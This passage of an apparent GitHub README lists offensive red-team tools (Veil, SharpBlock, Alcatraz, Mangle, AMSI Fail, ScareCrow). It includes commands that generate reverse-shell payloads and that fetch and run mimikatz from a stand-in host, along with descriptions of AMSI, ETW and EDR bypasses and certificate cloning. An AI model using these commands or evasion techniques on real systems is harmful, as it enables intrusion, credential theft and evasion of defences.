dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-payloads\n\n# List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-encoders\n\n# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n# List all payloads (–list-payloads) for the tool Evasion (-t Evasion)\n./Veil.py -t Evasion --list-payloads\n\n# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)\u003c/span\u003e\n./Veil.py -t Ordnance --list-payloads\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)\u003c/span\u003e\n./Veil.py -t Ordnance --list-encoders\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\u003c/span\u003e\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all payloads (–list-payloads) for the tool Evasion (-t Evasion)\u003c/span\u003e\n./Veil.py -t Evasion --list-payloads\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate shellcode using Evasion, 
payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\u003c/span\u003e\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eVeil creators wrote a nice \u003ca href=\"https://www.veil-framework.com/veil-command-line-usage/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e explaining further ordnance and evasion command line usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/CCob/SharpBlock\"\u003eSharpBlock\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpblock\" class=\"anchor\" aria-label=\"Permalink: 🔙SharpBlock\" href=\"#sharpblock\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA method of bypassing EDR's active projection DLL's by preventing entry point execution.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eFeatures:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eBlocks EDR DLL entry point execution, which prevents EDR hooks from being placed.\u003c/li\u003e\n\u003cli\u003ePatchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.\u003c/li\u003e\n\u003cli\u003eHost process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).\u003c/li\u003e\n\u003cli\u003eImplanted process is hidden to help evade scanners looking for hollowed processes.\u003c/li\u003e\n\u003cli\u003eCommand line args are spoofed and implanted after process creation using stealthy EDR detection method.\u003c/li\u003e\n\u003cli\u003ePatchless ETW bypass.\u003c/li\u003e\n\u003cli\u003eBlocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUse \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e to compile the SharpBlock binary.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen the SharpBlock \u003ca href=\"https://github.com/CCob/SharpBlock\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\nSharpBlock -e 
http://evilhost.com/mimikatz.bin -s c:\\windows\\system32\\notepad.exe -d \u0026quot;Active Protection DLL for SylantStrike\u0026quot; -a coffee\n\n# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\nexecute-assembly SharpBlock.exe -e \\\\.\\pipe\\mimi -s c:\\windows\\system32\\notepad.exe -d \u0026quot;Active Protection DLL for SylantStrike\u0026quot; -a coffee\nupload_file /home/haxor/mimikatz.exe \\\\.\\pipe\\mimi\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\u003c/span\u003e\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\u003cspan class=\"pl-cce\"\u003e\\w\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eystem32\u003cspan class=\"pl-cce\"\u003e\\n\u003c/span\u003eotepad.exe -d \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eActive Protection DLL for SylantStrike\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -a coffee\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\u003c/span\u003e\nexecute-assembly SharpBlock.exe -e \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eipe\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimi -s c:\u003cspan class=\"pl-cce\"\u003e\\w\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eystem32\u003cspan class=\"pl-cce\"\u003e\\n\u003c/span\u003eotepad.exe -d \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eActive Protection DLL for SylantStrike\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -a coffee\nupload_file /home/haxor/mimikatz.exe 
\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eipe\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimi\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice PenTestPartners blog post \u003ca href=\"https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://youtu.be/0W9wkamknfM\" rel=\"nofollow\"\u003ehttps://youtu.be/0W9wkamknfM\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/weak1337/Alcatraz\"\u003eAlcatraz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-alcatraz\" class=\"anchor\" aria-label=\"Permalink: 🔙Alcatraz\" href=\"#alcatraz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 
1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAlcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e.exe\u003c/li\u003e\n\u003cli\u003e.dll\u003c/li\u003e\n\u003cli\u003e.sys\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eSome supported obfuscation features include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eObfuscation of immediate moves\u003c/li\u003e\n\u003cli\u003eControl flow flattening\u003c/li\u003e\n\u003cli\u003eADD mutation\u003c/li\u003e\n\u003cli\u003eEntry-point obfuscation\u003c/li\u003e\n\u003cli\u003eLea obfuscation\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Requirements)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eInstall: \u003ca href=\"https://vcpkg.io/en/getting-started.html\" rel=\"nofollow\"\u003ehttps://vcpkg.io/en/getting-started.html\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"vcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\"\u003e\u003cpre\u003evcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing the GUI to obfuscate a binary:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eLoad a binary by clicking \u003ccode\u003efile\u003c/code\u003e in the top left corner.\u003c/li\u003e\n\u003cli\u003eAdd functions by expanding the \u003ccode\u003eFunctions\u003c/code\u003e tree. 
(You can search by putting in the name in the searchbar at the top)\u003c/li\u003e\n\u003cli\u003eHit \u003ccode\u003ecompile\u003c/code\u003e (\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eObfuscating lots of functions might take some seconds\u003c/em\u003e)\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/weak1337/Alcatraz\"\u003ehttps://github.com/weak1337/Alcatraz\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/Mangle\"\u003eMangle\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mangle\" class=\"anchor\" aria-label=\"Permalink: 🔙Mangle\" href=\"#mangle\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMangle is a tool that manipulates aspects of compiled executables (.exe or DLL).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIn doing so, Mangle helps loaders evade on-disk and in-memory scanners.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"go get github.com/Binject/debug/pe\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ego get github.com/Binject/debug/pe\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThen build it\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\" -C string\n Path to the file containing the certificate you want to clone\n -I string\n Path to the orginal file\n -M Edit the PE file to strip out Go 
indicators\n -O string\n The new file name\n -S int\n How many MBs to increase the file by\"\u003e\u003cpre\u003e -C string\n Path to the file containing the certificate you want to clone\n -I string\n Path to the orginal file\n -M Edit the PE file to strip out Go indicators\n -O string\n The new file name\n -S int\n How many MBs to increase the file by\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/optiv/Mangle#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/optiv/Mangle\"\u003ehttps://github.com/optiv/Mangle\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"http://amsi.fail/\" rel=\"nofollow\"\u003eAMSI Fail\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-amsi-fail\" class=\"anchor\" aria-label=\"Permalink: 🔙AMSI Fail\" href=\"#amsi-fail\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 
0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNice f-secure blog explaining AMSI \u003ca href=\"https://blog.f-secure.com/hunting-for-amsi-bypasses/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"http://amsi.fail/\" rel=\"nofollow\"\u003ehttp://amsi.fail/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/ScareCrow\"\u003eScareCrow\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scarecrow\" class=\"anchor\" aria-label=\"Permalink: 🔙ScareCrow\" href=\"#scarecrow\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 
1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen executed, ScareCrow will copy the bytes of the system DLLs stored on disk in \u003ccode\u003eC:\\Windows\\System32\\\u003c/code\u003e. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. 
Since EDRs only hook these processes in memory, they remain unaltered.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNice blogs for learning about techniques utilized by ScareCrow:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved\" rel=\"nofollow\"\u003eEndpoint Detection and Response: How Hackers Have Evolved\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught\" rel=\"nofollow\"\u003eEDR and Blending In: How Attackers Avoid Getting Caught\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eScareCrow requires golang 1.16.1 or later to compile loaders.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Clone\ngit clone https://github.com/optiv/ScareCrow\ncd ScareCrow\n\n# Install dependencies\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n# Required\nopenssl\nosslsigncode\nmingw-w64\n\n# Build\ngo build ScareCrow.go\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Clone\u003c/span\u003e\ngit clone https://github.com/optiv/ScareCrow\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e ScareCrow\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Install dependencies\u003c/span\u003e\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e 
Required\u003c/span\u003e\nopenssl\nosslsigncode\nmingw-w64\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build\u003c/span\u003e\ngo build ScareCrow.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Usage of ./ScareCrow:\n -I string\n Path to the raw 64-bit shellcode.\n -Loader string\n Sets the type of process that will sideload the malicious payload:\n [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)\n [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n [*] excel - Loads into a hidden Excel process using a JScript loader.\n [*] msiexec - Loads into MSIexec process using a JScript loader.\n [*] wscript - Loads into WScript process using a JScript loader. (default \u0026quot;binary\u0026quot;)\n -O string\n Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.\n -configfile string\n The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eUsage of ./ScareCrow:\n -I string\n Path to the raw 64-bit shellcode.\n -Loader string\n Sets the type of process that will sideload the malicious payload:\n [*] binary - Generates a binary based payload. 
(This type does not benefit from any sideloading)\n [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n [*] excel - Loads into a hidden Excel process using a JScript loader.\n [*] msiexec - Loads into MSIexec process using a JScript loader.\n [*] wscript - Loads into WScript process using a JScript loader. (default \"binary\")\n -O string\n Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.\n -configfile string\n The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/optiv/ScareCrow#loader\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/optiv/ScareCrow\"\u003ehttps://github.com/optiv/ScareCrow\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
